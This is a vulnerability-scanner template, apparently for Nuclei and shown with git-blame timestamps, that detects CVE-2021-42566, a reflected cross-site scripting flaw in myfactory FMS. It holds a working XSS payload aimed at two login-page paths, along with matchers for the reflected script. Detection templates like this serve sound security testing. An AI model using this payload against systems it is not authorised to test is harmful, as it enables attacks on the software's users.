2021-10-27 14:43:56 +00:00
|
|
|
id: CVE-2021-42566
|
|
|
|
|
|
|
|
info:
|
2022-09-09 17:34:37 +00:00
|
|
|
name: myfactory FMS - Cross-Site Scripting
|
2021-10-28 18:52:29 +00:00
|
|
|
author: madrobot
|
2021-10-27 14:43:56 +00:00
|
|
|
severity: medium
|
2022-02-28 17:52:06 +00:00
|
|
|
description: myfactory.FMS before 7.1-912 allows cross-site scripting via the Error parameter.
|
2021-10-27 14:43:56 +00:00
|
|
|
reference:
|
2022-02-28 17:52:06 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-42566
|
2021-10-27 14:43:56 +00:00
|
|
|
- https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-001/-cross-site-scripting-in-myfactory-fms
|
2021-10-28 18:52:29 +00:00
|
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-42566
|
2022-05-17 09:18:12 +00:00
|
|
|
- https://www.redteam-pentesting.de/advisories/rt-sa-2021-001
|
2021-10-27 14:43:56 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 6.1
|
2021-10-27 14:43:56 +00:00
|
|
|
cve-id: CVE-2021-42566
|
|
|
|
cwe-id: CWE-79
|
2023-07-11 19:49:27 +00:00
|
|
|
epss-score: 0.00102
|
2023-04-12 10:55:48 +00:00
|
|
|
cpe: cpe:2.3:a:myfactory:fms:*:*:*:*:*:*:*:*
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 2
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: myfactory
|
|
|
|
product: fms
|
|
|
|
tags: cve,cve2021,myfactory,xss
|
2021-10-27 14:43:56 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-10-27 14:43:56 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
2021-10-28 18:52:29 +00:00
|
|
|
- '{{BaseURL}}/ie50/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
|
|
|
- '{{BaseURL}}/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
2021-10-27 14:43:56 +00:00
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: body
|
2021-10-28 18:52:29 +00:00
|
|
|
words:
|
|
|
|
- "</script><script>alert(document.domain)</script>"
|
2021-10-27 14:43:56 +00:00
|
|
|
condition: and
|
|
|
|
|
|
|
|
- type: word
|
2021-10-28 18:52:29 +00:00
|
|
|
part: header
|
2021-10-27 14:43:56 +00:00
|
|
|
words:
|
|
|
|
- "text/html"
|
2023-07-11 19:49:27 +00:00
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|